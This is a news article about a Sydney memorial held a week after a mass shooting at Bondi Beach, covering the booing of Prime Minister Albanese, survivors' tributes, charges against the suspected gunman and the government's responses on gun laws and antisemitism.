    Prime Minister Anthony Albanese was booed when he arrived at the memorial event – an expression of anger by Australia’s Jewish community against his government after a rise of antisemitic attacks over the past few months.

    As the sun set over Sydney on Sunday evening, a minute’s silence was observed at 18:47 (07:47 GMT) – exactly one week since the first reports of gunfire at the famous beach.

    There was heavy security at the memorial event. Some cordoned-off areas were guarded by armed riot squad officers who had their faces covered, while a police patrol boat was visible off the coast of Bondi Beach.

    For many Australians, this level of security is an unfamiliar sight.

    A large crowd – many wearing kippas, the Jewish skullcap, or draped in Australian flags – gathered to listen to speeches after the observing the silence.

    Bee balloons floated in the wind in honour of the youngest victim of the attack, Matilda, who was nicknamed “Matilda Bee”.

    Later in the ceremony, the crowd sang Waltzing Matilda, the song the 10-year-old was named after.

    Soon after, the crowd chanted the name of another child – Chaya, a 14-year-old who put herself in the firing line to protect a stranger’s children.

    Shot in the leg, she used crutches to take to the stage.

    “If you guys get inspired by one thing, one thing on all this, be the light in that field of darkness,” she said.

    The event ended with the lighting of the menorah – something the crowds gathered for Hannukah last week couldn’t do.

    But Sunday’s memorial was not limited to Bondi Beach or the state of New South Wales.

    In a nation-wide gesture of “light over darkness”, the windowsills of countless homes across Australia were lined with candles.

    Watch: Moment Australian PM Anthony Albanese booed at Bondi memorial

    As Albanese arrived for the ceremony, one person in the crowd shouted: “Blood on your hands.”

    The prime minister looked startled at the hostility and his wife Jodie Haydon grasped his arm in support.

    At least one member of the crowd was tackled by police after moving towards the prime minister.

    The Jewish community in Australia has repeatedly said this attack was a shock but not a surprise after a rise in antisemitic attacks in Australia since the 7 October 2023 Hamas attack on Israel, and the subsequent military retaliation war launched by Israel in the Gaza Strip.

    The overwhelming view is that more could and should have been done to prevent the Sydney attack from happening.

    Albanese has acknowledged the criticism, saying: “I accept my responsibility for the part in that as prime minister of Australia.”

    More widely, Albanese has been accused by some of siding with the Palestinians over supporting Israel.

    The relationship worsened when he moved to recognise the state of Palestine earlier this year.

    Israeli Prime Minister Benjamin Netanyahu has accused him – as well as the leaders of other countries that have recognised a Palestinian state – of rewarding Hamas.

    After the Bondi Beach attack last Sunday, Netanyahu said Albanese’s government “did nothing to stop the spread of antisemitism in Australia”.

    In contrast to the reception for the Australian prime minister, Chris Minns, the Premier of New South Wales, was praised at the Sydney memorial service as an exemplary leader, partly for the speed with which he admitted government errors in the lead-up to the attack.

    He also attended the funerals of several victims this week. Albanese was not invited to some.

    “We are deeply sorry,” Minns said at the event.

    “We grieve with you, and with humility, I acknowledge that the government’s highest duty is to protect its citizens. And we did not do that one week ago.”

    The shooting had “highlighted a deep vein of antisemitic hate in our community”, Minns said, adding: “This must be confronted.”

    The president of the New South Wales Jewish Board of Deputies, David Ossip, was hailed with loud cheers as he called for a “Royal Commission which goes beyond New South Wales, to get to the bottom of how this catastrophe took place”.

    Suspected gunman Naveed Akram, 24, has been charged with 59 offences, including 15 counts of murder and one of committing a terrorist act. His father Sajid was killed during the attack.

    Days after the attack, Albanese announced a raft of measures to crack down on hate speech and incitement to violence.

    And shortly before Sunday’s ceremony, he announced a review into the police and national intelligence agencies.

    “The ISIS-inspired atrocity last Sunday reinforces the rapidly changing security environment in our nation,” Albanese said, using an acronym for the Islamic State group.

    He has also said he will reform gun laws and the government has launched a gun buyback scheme – the largest since the Port Arthur massacre in 1996, which left 35 people dead and prompted Australia to introduce world-leading gun control measures.



    Source link